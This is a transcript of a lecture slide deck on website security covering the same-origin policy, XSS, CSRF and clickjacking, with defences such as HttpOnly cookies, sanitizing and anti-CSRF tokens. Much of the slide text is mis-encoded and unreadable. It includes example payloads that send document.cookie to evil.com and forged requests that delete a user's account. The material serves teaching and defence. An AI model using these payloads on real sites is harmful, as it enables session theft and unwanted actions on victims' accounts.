Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Selected Topics on Website Security @ 102-2 CCSP

Selected Topics on Website Security @ 102-2 CCSP

Concept of Same Origin Policy, XSS, CSRF & Clickjacking

1b56cc5159a07e4eee8f819c1a2557e9?s=128

Johnson Liang

May 29, 2014
Tweet

More Decks by Johnson Liang

Other Decks in Technology

Transcript

  1. Selected Topics on Website Security Concept of Same Origin Policy,

    XSS, CSRF & Clickjacking MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
  2. খࢿ҆શ޲લি Concept of Same Origin Policy, XSS, CSRF & Clickjacking

    MrOrz, 102-2 CCSP Reference: ⽩白帽⼦子講 Web 安全
  3. Same-Origin Policy ಉݯ੓ࡦ

  4. ᖣ᧸ث࠷֩৺໵࠷جຊత҆શޭೳʜʜ 8FCੋݐߏࡏಉݯ੓ࡦతجૅ೭্తɻ – 吳翰清 ❝ ❞

  5. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

    㑌ݸᖣ᧸ث౎။ɿ
  6. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

    एᔒ༗ಉݯ੓ࡦɿ
  7. Same Origin Different Origin ڋ㘺 Ҹڐ ڈ፤ త౦੢ ڈ፤ త౦੢

    Upon visiting http://evil.mobile.org : $.get(‘http://facebook.com’, {}, function(data){ // 未經允許就得到你的 Facebook 塗鴉牆 }, ‘html’); एᔒ༗ಉݯ੓ࡦɿ
  8. https://developer.mozilla.org/zh-TW/docs/JavaScript/Same_origin_policy_for_JavaScript host, port & protocol Same Origin Different Origin

  9. ༬ઃڋ㘺ލ໢Ҭ፤ࢿྉ Լྻҝಛྫ

  10. ಛྫҰɿՄލ໢Ҭࡌೖࢿݯ೭ඪត • <script> • <img> • <iframe> • <link> •

    Javascript 無從讀寫其內容
  11. ಛྫೋɿ$SPTT0SJHJO 3FTPVSDF4IBSJOH $034 • Origin request header • Access-Control-Allow-XXX response

    header • Enabling cross-origin ajax, web font, WebGL & canvas
  12. Cross-Site Scripting (XSS)

  13. ࢦ᱆٬ಁաʮ)5.-২ೖʯ篡վྃ໢ทɼᎎೖྃ ዱҙతࢦྩߘɼਐҰ㑊ࡏ࢖༻ऀᖣ᧸໢ท࣌ɼ߇ ੍࢖༻ऀᖣ᧸ثతҰछ߈㐝ɻ – 吳翰清 ❝ ❞

  14. <section class="intro"> <%- user.desc %> </section> Your site : Example

    #1 ࢖༻ऀ ༌ೖత)5.-
  15. <section class="intro"> <p>Hello</p> <p>I am Johnson</p> </section> Your site :

    Example #1
  16. <section class="intro"> <script type="text/javascript"> $.getJSON('http://evil.com/', { stoken: document.cookie }); </script>

    </section> Your site : Example #1 ፨๚ࠑ༻㖽ท໘తਓɼDPPLJF။ඃFWJMDPN䫖૸
  17. <script type="text/javascript"> var pageTitle = "<%= userPage.title %>"; </script> Your

    site : Example #2 ࢖༻ऀࣗ༝༌ೖతࣈ۲
  18. <script type="text/javascript"> var pageTitle = ""; $.getJSON(...); ""; </script> Your

    site : Example #2 ፨๚ࠑ༻㖽ท໘తਓɼࢿྉ။ඃ䫖૸
  19. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3

    ࢖༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!</h1>
  20. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').html(data.userPageTitle); }); Your site : Example #3

    ࢖༻ऀࣗ༝༌ೖతࣈ۲ <h1>Welcome to my page!<script>$.getJSON('http://evil.com',...);</script></h1>
  21. Ṝछ߈㐝తࣔൣҊྫੋލ໢ҬతɼॴҎڣ z$SPTTz 4JUF 4DSJQUJOHɻᚙల౸ࠓఱɼੋ൱ލ໢Ҭቮៃෆ ࠶ॏཁɼ944Ṝݸ໊ࣈჟҰ௚อཹྃԼိɻ – 吳翰清 ❝ ❞

  22. ๷ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });

    ༬ઃଖመबੋUSVF
  23. ๷ڔํࣜ 防⽌止 Cookie 盜⽤用:HttpOnly res.cookie('key', 'value', { httpOnly: true });

    ༬ઃଖመबੋUSVF
  24. ๷ڔํࣜ HTML 輸出檢查 — 盡量不⽤用 <%- %> <section class="intro"> <%=

    user.desc %> </section>
  25. ๷ڔํࣜ HTML 輸出檢查 — Caja-HTML-Sanitizer // Controller ! var sanitizer

    = require('sanitizer'); sanitizedIntro = sanitizer.sanitize(user.desc); ! <!-- View --> <section class="intro"> <%- sanitizedIntro %> </section> อཹແ֐త)5.-UBHT
  26. ๷ڔํࣜ Javascript 輸出檢查 — ⽤用現成 JSON.stringify <script type="text/javascript"> var page

    = <%- JSON.stringify({ title: userPage.title }) %>; </script>
  27. ๷ڔํࣜ DOM-based XSS — 盡量⽤用 .text(…) 取代 .html(…) 或先 sanitize

    想插⼊入的 HTML. $.getJSON('http://yoursite.com/page/'+pageId, {}, function(data){ $('h1').text(data.userPageTitle); });
  28. Cross-Site Request Forgery (CSRF/XSRF)

  29. Your site : Example #4 // Delete current user account

    app.get('/user/delete', userCtrl.delete);
  30. evil.com : Example #4 <img src="http://yoursite.com/user/delete"> ፨๚ࠑFWJMTJUFతਓɼ؃౸ྃ વޙ䭪ʗଞࡏZPVSTJUFDPNతாᥒबല໊஍ඃ႟ᎃྃ

  31. ߈㐝ऀᷮᷮ༠ಋ࢖༻ऀ଄๚ྃҰݸท໘ɼबҎ֘ ࢖༻ऀత਎෼ɼࡏZPVSTJUFDPNཫࣥߦྃҰ࣍ૢ ࡞ʜʜṜछ SFRVFTU ੋ߈㐝ऀॴِ଄తɼॴҎ ڣz$SPTTTJUF3FRVFTU'PSHFSZzɻ – 吳翰清 ❝ ❞

  32. <iframe src="https://mail.google.com/mail/u/0/?logout"> Demo:cryptogasm.com/gmail-logout.html

  33. evil.com : Example #5 ፨๚FWJMTJUFޙɼ࢖༻ऀࡏZPVSTJUFDPNతாᥒबല໊஍ඃ႟ᎃྃ <form action="http://yoursite.com/user/delete" method="post" id="evil-form"> </form>

    ! <script type="text/javascript"> $('#evil-form').submit(); </script>
  34. ๷ڔํࣜ • CSRF 攻擊成功的要素:request 的所有參數都可以被 攻擊者猜測到。 • Anti-CSRF Token:使攻擊者無法拼湊正確 request。

  35. ๷ڔํࣜ

  36. ๷ڔํࣜ

  37. ๷ڔํࣜ දᄸૹग़ޙɼޙ୺DPOUSPMMFS။ᒾ查දᄸత UPLFOੋ൱ᢛDPPLJFதతUPLFO૬ූɼ एෆҰᒬɼबෆ၏ࣄɻ

  38. ๷ڔํࣜ http://stackoverflow.com/questions/20420762/how-to-enable-csrf-in-express3 // Express settings ! app.use(express.cookieParser('optional secret string')); app.use(express.session());

    app.use(express.csrf()); app.use(function (req, res, next) { res.locals.csrftoken = req.csrfToken(); next(); }); ! ! ! <!-- View --> ! <form action="..." method="post"> <input type="hidden" name="_csrf" value="<%= csrftoken %>"> </form> ᩋTFTTJPOཫతBOUJDTSGUPLFO ࡏWJFXཫ໵ೳ፤ಘ౸
  39. Clickjacking

  40. Jeremiah Grossman and Robert Hansen, 2008

  41. http://www.crazylearner.org/clickjacking-example/ Copyright 2014 Crazylearner. Fair use

  42. None
  43. ๷ڔํࣜ w ᩋ㟬త໢᜾ෆඃ࠹ਐJGSBNFཫ • x-frame-options: deny w IUUQTHJUIVCDPNFWJMQBDLFUIFMNFU Can’t be

    your site!
  44. http://youtu.be/VRCUpXLguHM 吳翰清 著

  45. http://youtu.be/VRCUpXLguHM 吳翰清 著